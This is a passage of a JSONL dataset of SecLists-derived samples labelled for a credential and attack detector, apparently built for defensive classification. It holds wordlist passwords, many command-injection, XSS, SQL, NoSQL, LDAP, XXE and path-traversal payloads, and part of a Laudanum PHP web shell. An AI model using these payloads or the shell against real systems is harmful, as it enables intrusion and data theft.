{"password": "keenan"}}]} {"id": "seclists_00756", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=medical\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "medical"}}]} {"id": "seclists_00757", "source": "seclists", "source_license": "MIT", "text": "filename=%0A%20str%3D%24%28echo%20UVFUKR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20UVFUKR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20", "injection_type": "cmd"}}]} {"id": "seclists_00758", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&#x3c; HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x3c;", "injection_type": "cmd"}}]} {"id": "seclists_00759", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Lindsay Electronics,SENTINEL,SENTINEL,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Lindsay Electronics,SENTINEL,SENTINEL,"}}]} {"id": "seclists_00760", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_00761", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%0aecho$IFSZOHJGD$((19%2B47))$(echo$IFSZOHJGD)ZOHJGD' HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0aecho$IFSZOHJGD$((19%2B47))$(echo$IFSZOHJGD)ZOHJGD'", "injection_type": "cmd"}}]} {"id": "seclists_00762", "source": "seclists", "source_license": "MIT", "text": "username=union select&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "union select", "injection_type": "SQL"}}]} {"id": "seclists_00763", "source": "seclists", "source_license": "MIT", "text": "filename=../../../../../../../../../../../../etc/hosts", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "../../../../../../../../../../../../etc/hosts", "injection_type": "cmd"}}]} {"id": "seclists_00764", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"server_addr\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"server_addr\" -->", "injection_type": "SSI"}}]} {"id": "seclists_00765", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &#X00003c;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X00003c;", "injection_type": "cmd"}}]} {"id": "seclists_00766", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>JavaScript concatenation vector variant 5</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "JavaScript concatenation vector variant 5", "injection_type": "XSS"}}]} {"id": "seclists_00767", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<div draggable=\"true\" contenteditable>drag me</div><applet ondragover=alert(1) contenteditable>drop here</applet>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><applet ondragover=alert(1) contenteditable>drop here</applet>", "injection_type": "XSS"}}]} {"id": "seclists_00768", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<applet oncopy=\"alert(1)\" contenteditable>test</applet>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<applet oncopy=\"alert(1)\" contenteditable>test</applet>", "injection_type": "XSS"}}]} {"id": "seclists_00769", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><dialog onmouseenter=\"alert(1)\">test</dialog></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<dialog onmouseenter=\"alert(1)\">test</dialog>", "injection_type": "XSS"}}]} {"id": "seclists_00770", "source": "seclists", "source_license": "MIT", "text": "filename=\\t", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\t", "injection_type": "cmd"}}]} {"id": "seclists_00771", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Non-Alpha/Non-Digit Part 2 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Non-Alpha/Non-Digit Part 2", "injection_type": "XSS"}}]} {"id": "seclists_00772", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Novell,USER_TEMPLATE,<BLANK>,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Novell,USER_TEMPLATE,<BLANK>,"}}]} {"id": "seclists_00773", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///c:/boot.ini\" >]><foo>&xxe;</foo>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///c:/boot.ini\" >]><foo>&xxe;</foo>", "injection_type": "XXE"}}]} {"id": "seclists_00774", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_00775", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author Name: ha.ckers.org\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_00776", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %26%20sleep%200%20%26%26%20str%3D%24%28echo%20WQWTED%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WQWTED%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_00777", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. All important characters are obfuscated by unclosed entities.</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. All important characters are obfuscated by unclosed entities.", "injection_type": "XSS"}}]} {"id": "seclists_00778", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<label draggable=\"true\" ondragleave=\"alert(1)\">test</label> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<label draggable=\"true\" ondragleave=\"alert(1)\">test</label>", "injection_type": "XSS"}}]} {"id": "seclists_00779", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"FRAME\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "FRAME", "injection_type": "XSS"}}]} {"id": "seclists_00780", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%2527%3B%20str%3D%24%28echo%20SNJPYD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%3B%20str%3D%24%28echo%20SNJPYD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//", "injection_type": "cmd"}}]} {"id": "seclists_00781", "source": "seclists", "source_license": "MIT", "text": "filename=||echo%20UWJWIH$((97%2B96))$(echo%20UWJWIH)UWJWIH%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "||echo%20UWJWIH$((97%2B96))$(echo%20UWJWIH)UWJWIH%7C", "injection_type": "cmd"}}]} {"id": "seclists_00782", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<svg><animate onbegin=alert(1) attributeName=x dur=1s> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<svg><animate onbegin=alert(1) attributeName=x dur=1s>", "injection_type": "XSS"}}]} {"id": "seclists_00783", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Author Name: OWASP HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: OWASP", "injection_type": "XSS"}}]} {"id": "seclists_00784", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UIVPGT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UIVPGT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_00785", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %22%26echo$IFSEVHWEV$((99%2B12))$(echo$IFSEVHWEV)EVHWEV%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%26echo$IFSEVHWEV$((99%2B12))$(echo$IFSEVHWEV)EVHWEV%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_00786", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%2522%0A%20str%3D%24%28echo%20IWTYRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%0A%20str%3D%24%28echo%20IWTYRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_00787", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '@variable';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "@variable", "injection_type": "SQL"}}]} {"id": "seclists_00788", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n' && this.password.match(/.*/)//+%00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' && this.password.match(/.*/)//+%00", "injection_type": "NoSQL"}}]} {"id": "seclists_00789", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '1;SELECT%20*';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1;SELECT%20*", "injection_type": "SQL"}}]} {"id": "seclists_00790", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><acronym id=x tabindex=1 onbeforedeactivate=alert(1)></acronym><input autofocus></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<acronym id=x tabindex=1 onbeforedeactivate=alert(1)></acronym><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_00791", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:159159@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "159159"}}]} {"id": "seclists_00792", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:football1@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "football1"}}]} {"id": "seclists_00793", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<a href=javascript:alert(1)>click HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<a href=javascript:alert(1)>click", "injection_type": "XSS"}}]} {"id": "seclists_00794", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><sub onpaste=\"alert(1)\" contenteditable>test</sub></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<sub onpaste=\"alert(1)\" contenteditable>test</sub>", "injection_type": "XSS"}}]} {"id": "seclists_00795", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><em onclick=\"alert(1)\">test</em></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<em onclick=\"alert(1)\">test</em>", "injection_type": "XSS"}}]} {"id": "seclists_00796", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Description: This vector uses HTML wrapped in XML and can be used to circumvent common filters. This works in Gecko based browsers only.</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector uses HTML wrapped in XML and can be used to circumvent common filters. This works in Gecko based browsers only.", "injection_type": "XSS"}}]} {"id": "seclists_00797", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJBKAZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJBKAZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20", "injection_type": "cmd"}}]} {"id": "seclists_00798", "source": "seclists", "source_license": "MIT", "text": "password: Digital Equipment,2,manager,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Digital Equipment,2,manager,"}}]} {"id": "seclists_00799", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<isindex onmouseover=\"alert(1)\">test</isindex> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<isindex onmouseover=\"alert(1)\">test</isindex>", "injection_type": "XSS"}}]} {"id": "seclists_00800", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Sharp,admin,admin,Different to other Sharp units\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Sharp,admin,admin,Different to other Sharp units"}}]} {"id": "seclists_00801", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \\x3D \\x27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\x3D \\x27", "injection_type": "cmd"}}]} {"id": "seclists_00802", "source": "seclists", "source_license": "MIT", "text": "filename=&#X003C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X003C", "injection_type": "cmd"}}]} {"id": "seclists_00803", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:lookin@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "lookin"}}]} {"id": "seclists_00804", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: ha.ckers.org</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_00805", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %7C%20%5B%201%20-ne%20%24%28echo%20VNALZQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%201%20-ne%20%24%28echo%20VNALZQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22", "injection_type": "cmd"}}]} {"id": "seclists_00806", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><X onxxx=1</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<X onxxx=1", "injection_type": "XSS"}}]} {"id": "seclists_00807", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><frame draggable=\"true\" ondragleave=\"alert(1)\">test</frame></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<frame draggable=\"true\" ondragleave=\"alert(1)\">test</frame>", "injection_type": "XSS"}}]} {"id": "seclists_00808", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Description: Spaces and meta chars before the JavaScript in images for XSS (this is useful if the pattern match doesn't take into account spaces in the word \u201djavascript:\u201d - which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the \u201djavascript:\u201d keyword. The actual reality is you can have any char from 1-32 in decimal).</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Spaces and meta chars before the JavaScript in images for XSS (this is useful if the pattern match doesn't take into account spaces in the word \u201djavascript:\u201d - which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the \u201djavascript:\u201d keyword. The actual reality is you can have any char from 1-32 in decimal).", "injection_type": "XSS"}}]} {"id": "seclists_00809", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//", "injection_type": "cmd"}}]} {"id": "seclists_00810", "source": "seclists", "source_license": "MIT", "text": "<?php\n/* *****************************************************************************\n***\n*** Laudanum Project\n*** A Collection of Injectable Files used during a Penetration Test\n***\n*** More information is available at:\n*** http://laudanum.secureideas.net\n*** laudanum@secureideas.net\n***\n*** Project Leads:\n*** Kevin Johnson <kjohnson@secureideas.net\n*** Tim Medin <tim@counterhack.com>\n***\n*** Copyright 2014 by Kevin Johnson and the Laudanum Team\n***\n********************************************************************************\n***\n*** This file allows browsing of the file system.\n*** Written by Tim Medin <tim@counterhack.com>\n***\n*** 12/28/2013 - updated by Jason Gillam <jgillam@secureideas.com> - fixed parent folder.\n***\n********************************************************************************\n*** This program is free software; you can redistribute it and/or\n*** modify it under the terms of the GNU General Public License\n*** as published by the Free Software Foundation; either version 2\n*** of the License, or (at your option) any later version.\n***\n*** This program is distributed in the hope that it will be useful,\n*** but WITHOUT ANY WARRANTY; without even the implied warranty of\n*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n*** GNU General Public License for more details.\n***\n*** You can get a copy of the GNU General Public License from this\n*** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n*** You can also write to the Free Software Foundation, Inc., 59 Temple\n*** Place - Suite 330, Boston, MA 02111-1307, USA.\n***\n***************************************************************************** */\n\n\ninclude 'ipcheck.php';\n\n\n\n/* This error handler will turn all notices, warnings, and errors into fatal\n * errors, unless they have been suppressed with the @-operator. */\nfunction wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) {\n /* The @-opertor (used with chdir() below) temporarely makes\n * error_reporting() return zero, and we don't want to die in that case.\n * We do note the error in the output, though. */\n if (error_reporting() == 0) {\n $_SESSION['output'] .= $errstr . \"\\n\";\n } else {\n die('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum PHP File Browser</title>\n</head>\n<body>\n <h1>Fatal Error!</h1>\n <p><b>' . $errstr . '</b></p>\n <p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>\n\n <hr>\n <address>\n Copyright &copy; 2014, <a href=\"mailto:laudanum@secureideas.net\">Kevin Johnson</a> and the Laudanum team.<br/>\n Written by Tim Medin.<br/>\n Get the latest version at <a href=\"http://laudanum.secureideas.net\">laudanum.secureideas.net</a>.\n </address>\n\n</body>\n</html>');\n }\n}\n\n//set_error_handler('error_handler');\n\n\n/* Initialize some variables we need again and again. */\n$dir = isset($_GET[\"dir\"]) ? $_GET[\"dir\"] : \".\";\n$file = isset($_GET[\"file\"]) ? $_GET[\"file\"] : \"\";\n\nif ($file != \"\") {\n if(file_exists($file)) {\n\n $s = split(\"/\", $file);\n $filename = $s[count($s) - 1];\n header(\"Content-type: application/x-download\");\n header(\"Content-Length: \".filesize($file)); \n header(\"Content-Disposition: attachment; filename=\\\"\".$filename.\"\\\"\");\n readfile($file);\n die();\n }\n}\n?>\n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum File Browser</title>\n <link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n\n <script type=\"text/javascript\">\n </script>\n</head>\n<body onload=\"init()\">\n\n<h1>Laudanum File Browser 0.1</h1>\n<a href=\"<?php echo $_SERVER['PHP_SELF'] ?>\">Home</a><br/>\n\n<?php\n// get the actual path, add an ending / if necessary\n$curdir = realpath($dir);\n$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";\n\n$dirs = split(\"/\",$curdir);\n\n// Create the breadcrumb\necho \"<h2>Directory listing of <a href=\\\"\" . $_SERVER['PHP_SELF'] . \"?di", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "file.php"}}]} {"id": "seclists_00811", "source": "seclists", "source_license": "MIT", "text": "password: whocares\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "whocares"}}]} {"id": "seclists_00812", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: No Closing Script Tag HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: No Closing Script Tag", "injection_type": "XSS"}}]} {"id": "seclists_00813", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<style>:target {color:red;}</style><style id=x style=\"transition:color 1s\" ontransitionend=alert(1)></style> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {color:red;}</style><style id=x style=\"transition:color 1s\" ontransitionend=alert(1)></style>", "injection_type": "XSS"}}]} {"id": "seclists_00814", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, evil tags\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags", "injection_type": "XSS"}}]} {"id": "seclists_00815", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host='|echo%20CTNHMN$((74%2B58))$(echo%20CTNHMN)CTNHMN HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'|echo%20CTNHMN$((74%2B58))$(echo%20CTNHMN)CTNHMN", "injection_type": "cmd"}}]} {"id": "seclists_00816", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a", "injection_type": "cmd"}}]} {"id": "seclists_00817", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:mandy@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "mandy"}}]} {"id": "seclists_00818", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, obfuscated, gecko, XML predicates, evil tags\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, obfuscated, gecko, XML predicates, evil tags", "injection_type": "XSS"}}]} {"id": "seclists_00819", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<dialog onkeyup=\"alert(1)\" contenteditable>test</dialog> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<dialog onkeyup=\"alert(1)\" contenteditable>test</dialog>", "injection_type": "XSS"}}]} {"id": "seclists_00820", "source": "seclists", "source_license": "MIT", "text": "GET /api/user?filter=*(|(objectclass=*)) HTTP/1.1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", 